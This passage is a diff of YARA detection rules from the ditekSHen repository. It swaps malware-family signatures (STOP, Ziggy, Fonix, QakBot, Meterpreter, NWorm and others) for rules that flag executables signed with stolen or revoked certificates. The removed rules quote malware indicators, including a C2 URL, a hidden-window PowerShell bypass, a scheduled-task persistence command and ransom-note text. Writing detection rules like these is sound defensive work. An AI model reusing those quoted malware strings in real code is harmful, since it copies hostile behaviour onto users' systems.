+		thumbprint = "67ee69f380ca62b28cecfbef406970ddd26cd9be"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and ( all of ( $s* ) or $developerid )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APP DIVISION ApS" and pe.signatures [ i ] . serial == "00:b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" )
 }
-rule DITEKSHEN_MALWARE_Osx_Techyutils : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_51Cd5393514F7Ace2B407C3Dbfb09D8D : FILE
 {
 	meta:
-		description = "Detects TechyUtils OSX packages"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "59fd4165-987f-5b68-9341-d78184b25a1c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "f2f7b08e-111c-570b-b376-79145050ca42"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3208-L3224"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L146-L157"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "071c67cace09dd66233bd4c4dd78c32d0f39f7e38dc06ec62e09fef67762d098"
+		logic_hash = "389dbdc85035fdd94e831940eda910349134600e921720729840c932123db36d"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Osx.Trojan.TechyUtils"
-
-	strings:
-		$s1 = "__ZL58__arclite_NSMutableDictionary__" ascii
-		$s2 = "__ZL46__arclite_NSDictionary_" ascii
-		$s3 = "<key>com.apple.security.get-task-allow</key>" fullword ascii
-		$s4 = "/productprice.svc/GetCountryCode" ascii
-		$s5 = "@_pthread_mutex_lock" fullword ascii
-		$s6 = "_mh_execute_header" fullword ascii
-		$s7 = "/Users/prasoon/Documents/" ascii
-		$developerid = "Developer ID Application: Techyutils Software Private Limited (VS9Q8BRRRJ)" ascii
+		thumbprint = "07a9fd6af84983dbf083c15983097ac9ce761864"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and ( all of ( $s* ) or $developerid )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APPI CZ a.s" and pe.signatures [ i ] . serial == "51:cd:53:93:51:4f:7a:ce:2b:40:7c:3d:bf:b0:9d:8d" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent04 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_030012F134E64347669F3256C7D050C5 : FILE
 {
 	meta:
-		description = "Detects known downloader agent downloading encoded binaries in patches from paste-like websites, most notably hastebin"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d591c591-aecc-557e-85b4-1e2589fbfbf9"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7f16b535-8a0f-583d-8bc3-0abf24f26632"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3247-L3263"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L159-L170"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "73e6af7c32d38ec5d1d2bc9f2517860367b46779b53e0faff8885b655561ab01"
+		logic_hash = "68bfd2e146e3b2bd1222de7f9981bb0e373bcb4727a81eb7060af36e6275d438"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.DLAgent04"
-
-	strings:
-		$x1 = "@@@http" ascii wide
-		$s1 = "HttpWebRequest" fullword ascii
-		$s2 = "GetResponseStream" fullword ascii
-		$s3 = "set_FileName" fullword ascii
-		$s4 = "set_UseShellExecute" fullword ascii
-		$s5 = "WebClient" fullword ascii
-		$s6 = "set_CreateNoWindow" fullword ascii
-		$s7 = "DownloadString" fullword ascii
+		thumbprint = "959caa354b28892608ab1bb9519424c30bebc155"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and #x1 > 1 and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Futumarket LLC" and pe.signatures [ i ] . serial == "03:00:12:f1:34:e6:43:47:66:9f:32:56:c7:d0:50:c5" )
 }
-rule DITEKSHEN_MALWARE_Win_Gdriverat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B7F19B13De9Bee8A52Ff365Ced6F67Fa : FILE
 {
 	meta:
-		description = "Detects GDriveRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "29e46280-39d1-5d49-ab0d-0a32398b30f0"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b9cbe1bd-b24f-5599-a8b9-9e6f9b70f37f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3265-L3284"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L172-L183"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "134e66d0afc90e7fbab2c9dd034f85eb504903481e12c1ab8d7bab9321da817a"
+		logic_hash = "afdc41aed0480593bb8c92955db044ebe1a695d4912176123e26e052a3e9d3ea"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.GDriveRAT"
-
-	strings:
-		$h1 = "https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart" fullword wide
-		$h2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" fullword wide
-		$h3 = "multipart/related; boundary=\"boundary_tag\"" fullword wide
-		$h4 = "https://www.googleapis.com/drive/v3/files" fullword wide
-		$s1 = "move gdrive.exe \"C:\\Users\\" fullword wide
-		$s2 = "file_data" fullword ascii
-		$s3 = "comp_id" fullword ascii
-		$s4 = "file_name" fullword ascii
-		$s5 = "refresh_token" fullword ascii
-		$s6 = "commands" fullword ascii
-		$s7 = "execute" fullword ascii
+		thumbprint = "61708a3a2bae5343ff764de782d7f344151f2b74"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of ( $h* ) and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALEXIS SECURITY GROUP, LLC" and pe.signatures [ i ] . serial == "00:b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" )
 }
-rule DITEKSHEN_MALWARE_Win_STOP : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4C8Def294478B7D59Ee95C61Fae3D965 : FILE
 {
 	meta:
-		description = "Detects STOP ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "e928d917-a9d9-5830-938a-59b62608e84c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2f95a688-2fb2-55b7-9cd5-44586d6d4dc8"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3286-L3309"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L185-L196"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "61f7e7c1139c56088b2f58b78ae132ffcfef0f931c15b67ea775b0d5e51d189d"
+		logic_hash = "d9e956d7d5b9389aebafd4b7025818ac8eb5a72aaa1b94068a12aa7a8029f97c"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-		snort2_sid = "920113"
-		snort3_sid = "920111"
-		clamav_sig = "MALWARE.Win.Ransomware.STOP"
-
-	strings:
-		$x1 = "C:\\SystemID\\PersonalID.txt" fullword wide
-		$x2 = "/deny *S-1-1-0:(OI)(CI)(DE,DC)" wide
-		$x3 = "e:\\doc\\my work (c++)\\_git\\encryption\\" ascii wide nocase
-		$s1 = "\" --AutoStart" fullword ascii wide
-		$s2 = "--ForNetRes" fullword wide
-		$s3 = "--Admin" fullword wide
-		$s4 = "%username%" fullword wide
-		$s5 = "?pid=" fullword wide
-		$s6 = /&first=(true|false)/ fullword wide
-		$s7 = "delself.bat" ascii
-		$mutex1 = "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}" fullword ascii
-		$mutex2 = "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}" fullword ascii
-		$mutex3 = "{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}" fullword ascii
+		thumbprint = ""
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and 1 of ( $mutex* ) ) or ( all of ( $x* ) ) or ( 6 of ( $s* ) and ( 1 of ( $x* ) or 1 of ( $mutex* ) ) ) or ( 9 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREAM SECURITY USA INC" and pe.signatures [ i ] . serial == "4c:8d:ef:29:44:78:b7:d5:9e:e9:5c:61:fa:e3:d9:65" )
 }
-rule DITEKSHEN_MALWARE_Win_Parallaxrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0A23B660E7322E54D7Bd0E5Acc890966 : FILE
 {
 	meta:
-		description = "Detects ParallaxRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "e602b28f-ae5d-52af-b1c5-5c41776dd4c5"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "c9817cbd-edce-5ae0-ad70-58d592ac415f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3311-L3328"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L198-L209"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7fd94dee44079b595b906f1687f44b51b8cebabbeb0900563b8d4fcc0e46bdd0"
+		logic_hash = "6b9009d0c509b38107eba5742613f8ec6f48e447225c664e374ef56d64b035f0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.ParallaxRAT"
-
-	strings:
-		$s1 = "[Clipboard End]" fullword wide
-		$s2 = "[Ctrl +" fullword wide
-		$s3 = "[Alt +" fullword wide
-		$s4 = "Clipboard Start" wide
-		$s5 = "(Wscript.ScriptFullName)" wide
-		$s6 = "CSDVersion" fullword ascii
-		$s7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" fullword ascii
-		$x1 = { 2e 65 78 65 00 00 84 00 00 4d 5a 90 00 }
-		$x2 = "This program cannot be run in DOS mode" ascii
+		thumbprint = "c1e0c6dc2bc8ea07acb0f8bdb09e6a97ae91e57c"
+		importance = 20
 
 	condition:
-		(( uint16( 0 ) == 0x5a4d and all of ( $s* ) ) or all of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ARTBUD RADOM SP Z O O" and pe.signatures [ i ] . serial == "0a:23:b6:60:e7:32:2e:54:d7:bd:0e:5a:cc:89:09:66" )
 }
-rule DITEKSHEN_MALWARE_Win_Meterpreter : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_04332C16724Ffeda5868D22Af56Aea43 : FILE
 {
 	meta:
-		description = "Detects Meterpreter payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d72fef80-d624-5e39-963a-8d7c12eb2d9c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7e6be2f5-2f34-5337-8beb-4ccc6c50ad2d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3330-L3343"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L211-L222"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5226cd7bb2344b822ee94d75f81a523ff701778de97a32ae52c604a4855e960c"
+		logic_hash = "338e7d9374de04d00162c9caf86d922f4d659b024ae7908f0e02ca4709a14a1d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "PACKET TRANSMIT" fullword ascii
-		$s2 = "PACKET RECEIVE" fullword ascii
-		$s3 = "\\\\%s\\pipe\\%s" fullword ascii wide
-		$s4 = "%04x-%04x:%s" fullword wide
-		$s5 = "server.dll" fullword ascii
+		thumbprint = "cba350fe1847a206580657758ad6813a9977c40e"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of them ) or ( filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bespoke Software Solutions Limited" and pe.signatures [ i ] . serial == "04:33:2c:16:72:4f:fe:da:58:68:d2:2a:f5:6a:ea:43" )
 }
-rule DITEKSHEN_MALWARE_Win_Trojan_Expresscms : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_085B70224253486624Fc36Fa658A1E32 : FILE
 {
 	meta:
-		description = "Detects ExpressCMS"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d096db0c-05f6-5b69-9d84-0105f2182ff3"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8d0f4499-1ed2-5277-be80-0b7f3499b360"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3366-L3382"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L224-L235"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "64d551e0c11b6394f9ae2b8fa749c36cb1b5c3f498592f95dc19fdea23c53160"
+		logic_hash = "8779cca652b366ce33a3735069fdc35657a6bed5b469a956cd236d76901f8f54"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.ExpressCMS"
-
-	strings:
-		$s1 = "/click.php?cnv_id=" fullword wide
-		$s2 = "/click.php?key=" wide
-		$s3 = "jdlnb" fullword wide
-		$s4 = "Gkjfdshfkjjd: dsdjdsjdhv" fullword wide
-		$s5 = "--elevated" fullword wide
-		$s6 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\%d" wide
-		$s7 = "\\Microsoft\\Manager.exe" fullword wide
-		$s8 = "\\Microsoft\\svchost.exe" fullword wide
+		thumbprint = "36834eaf0061cc4b89a13e019eccc6e598657922"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Best Fud, OOO" and pe.signatures [ i ] . serial == "08:5b:70:22:42:53:48:66:24:fc:36:fa:65:8a:1e:32" )
 }
-rule DITEKSHEN_MALWARE_Win_Meterpreterstager : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0086E5A9B9E89E5075C475006D0Ca03832 : FILE
 {
 	meta:
-		description = "Detects Meterpreter stager payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "dfbc37e9-13e0-55e2-a501-1005eea52b63"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "898bfe5f-5ac6-51f3-be55-09279a286835"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3384-L3395"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L237-L248"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0ac53a10abb1e4dd7da57872cd1779851d953127a912c31a5e411d8eb9bd07f4"
+		logic_hash = "613f21989dc369ef6b1d8e42a0d707810ef064c608e4e34ba5eb475164f14abc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "PAYLOAD:" fullword ascii
-		$s2 = "AQAPRQVH1" fullword ascii
-		$s3 = "ws2_32" fullword ascii
-		$s4 = "KERNEL32.dll" fullword ascii
+		thumbprint = "76f6c507e0bcf7c6b881f117936f5b864a3bd3f8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them and filesize < 100KB
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BlueMarble GmbH" and pe.signatures [ i ] . serial == "00:86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" )
 }
-rule DITEKSHEN_MALWARE_Win_Ziggy : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_039668034826Df47E6207Ec9Daed57C3 : FILE
 {
 	meta:
-		description = "Detects Ziggy ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "6d2d316a-cf19-5001-bf94-842346229d76"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8ae5f710-db8e-5d29-b247-a103f0878aa5"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3397-L3421"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L250-L261"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "103a50511971161ca673e0c8378aeca2fa7d0f6309966bbb2b70e0d039e0f196"
+		logic_hash = "b9579ba5dac45e38ef7b2b3381d1651395a4f648c68ae8e6fc36a0ea2d9b6300"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "920098"
-		snort3_sid = "920096"
-		clamav_sig = "MALWARE.Win.Ransomware.Ziggy"
-
-	strings:
-		$id1 = "/Ziggy Info;component/mainwindow.xaml" fullword wide
-		$id2 = "AZiggy Info, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" fullword ascii
-		$id3 = "Ziggy Ransomware" fullword wide
-		$id4 = "clr-namespace:Zeggy" fullword ascii
-		$s1 = "GetCooldown" fullword ascii
-		$s2 = "checkCommandMappings" fullword ascii
-		$s3 = "add_OnExecuteCommand" fullword ascii
-		$s4 = "MindLated.jpg" fullword wide
-		$s5 = "http://fixfiles.xyz/ziggy/api/info.php?id=" fullword wide
-		$s6 = "Reamaining time:" fullword wide
-		$msg1 = "<:In case of no answer in 12 hours write us to this e-mail" ascii
-		$msg2 = "Free decryption as guarantee" fullword ascii
-		$msg3 = "# Do not try to decrypt your data using third party software, it may cause permanent data loss" ascii
-		$msg4 = "# Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can becom" ascii
+		thumbprint = "f98bdfa941ebfa2fe773524e0f9bbe9072873c2f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $id* ) or 4 of ( $s* ) or 3 of ( $msg* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CHOO FSP, LLC" and pe.signatures [ i ] . serial == "03:96:68:03:48:26:df:47:e6:20:7e:c9:da:ed:57:c3" )
 }
-rule DITEKSHEN_MALWARE_Win_Nworm : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_736Dcfd309Ea4C3Bea23287473Ffe071 : FILE
 {
 	meta:
-		description = "Detects NWorm/N-W0rm payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "06546ccf-8914-5b1c-942f-99664b9ecf44"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "058c4e85-e004-5fe0-9e16-9dbe333371f6"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3423-L3443"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L263-L274"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a1397a057422be260b5bdf1eb58571e95c259c132cc2518b39e1524a0eda9c66"
+		logic_hash = "68a91e0e042606d49a5c83c972b0a6bf387c9d7d20c2df132edec717ab4603a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.NWorm"
-
-	strings:
-		$id1 = "N-W0rm" ascii
-		$id2 = "N_W0rm" ascii
-		$x1 = "pongPing" fullword wide
-		$x2 = "|NW|" fullword wide
-		$s1 = "runFile" fullword wide
-		$s2 = "runUrl" fullword wide
-		$s3 = "killer" fullword wide
-		$s4 = "powershell" fullword wide
-		$s5 = "wscript.exe" fullword wide
-		$s6 = "ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File \"" fullword wide
-		$s7 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" fullword wide
-		$s8 = "Start-Sleep -Seconds 1.5; Remove-Item -Path '" fullword wide
+		thumbprint = "8bfc13bf01e98e5b38f8f648f0f843b63af03f55"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $id* ) and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( all of ( $x* ) and 2 of ( $s* ) ) or 7 of ( $s* ) or 10 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ESTELLA, OOO" and pe.signatures [ i ] . serial == "73:6d:cf:d3:09:ea:4c:3b:ea:23:28:74:73:ff:e0:71" )
 }
-rule DITEKSHEN_MALWARE_Win_Qakbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_09C89De6F64A7Fdf657E69353C5Fdd44 : FILE
 {
 	meta:
-		description = "Detects variants of QakBot payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "3a3b3b6c-0969-584e-a184-7acfca3cdd42"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "613c4253-8a53-5faa-8376-10c9a35805cf"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3445-L3457"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L276-L287"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b64c05eb7ac03b2b4709f9979d117e4cacc617f21d0b3bf1c1be42aa18cc44cc"
+		logic_hash = "7fcb517a4160226cf89c13b5b27310d1e8a02d3f164a338a8d2901ef604f1d8a"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "stager_1.dll" fullword ascii
-		$s2 = "_vsnwprintf" fullword ascii
-		$s3 = "DllRegisterServer" fullword ascii
-		$s4 = "Win32_PnPEntity" fullword wide
-		$s5 = "0>user32.dll" fullword ascii
+		thumbprint = "7ad763dfdaabc1c5a8d1be582ec17d4cdcbd1aeb"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXON RENTAL SP Z O O" and pe.signatures [ i ] . serial == "09:c8:9d:e6:f6:4a:7f:df:65:7e:69:35:3c:5f:dd:44" )
 }
-rule DITEKSHEN_MALWARE_Win_Fonix : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_03B630F9645531F8868Dae8Ac0F8Cfe6 : FILE
 {
 	meta:
-		description = "Detects Fonix ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d67cce49-5f4f-59f6-b2a9-9c4dd1c6c0f6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "ca5203b8-3029-5914-b611-1717aefc7ccf"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3459-L3481"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L289-L300"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "159b8946f7772c76271de821eb12897689bf73d96fc6a1d7c4a65cdc50b877c7"
+		logic_hash = "0c388ee7cfc2f35d5e020520d0c5a04b872d5deff63fc551308168e60122f7fc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Fonix"
-
-	strings:
-		$s1 = "dontcryptanyway" fullword wide
-		$s2 = "Cpriv.key" ascii wide
-		$s3 = "Cpub.key" ascii wide
-		$s4 = "NetShareEnum() failed!Error: % ld" fullword wide
-		$s5 = "<div class='title'> Attention!</div><ul><li><u><b>DO NOT</b> pay" wide
-		$s6 = "Encryption Completed !!!" fullword wide
-		$s7 = "kill process" fullword ascii
-		$s8 = "Copy SystemID C:\\ProgramData\\SystemID" ascii
-		$id1 = "].FONIX" fullword wide
-		$id2 = "xinofconfig.txt" fullword ascii wide
-		$id3 = "XINOF4MUTEX" wide
-		$id4 = ":\\Fonix\\cryptoPP\\" ascii
-		$id5 = "schtasks /CREATE /SC ONLOGON /TN fonix" ascii
-		$id6 = "Ransomware\\Fonix" ascii
+		thumbprint = "ab027825daf46c5e686e4d9bc9c55a5d8c5e957d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 3 of ( $id* ) or ( 1 of ( $id* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Geksan LLC" and pe.signatures [ i ] . serial == "03:b6:30:f9:64:55:31:f8:86:8d:ae:8a:c0:f8:cf:e6" )
 }
-rule DITEKSHEN_MALWARE_Win_Bobik : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_020Bc03538Fbdc792F39D99A24A81B97 : FILE
 {
 	meta:
-		description = "Detects Bobik infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "12f14151-0c89-519d-85d3-4b4b82a950a3"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d5fd84b4-cccf-569d-96ea-26d9d21c6adf"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3483-L3498"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L302-L313"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
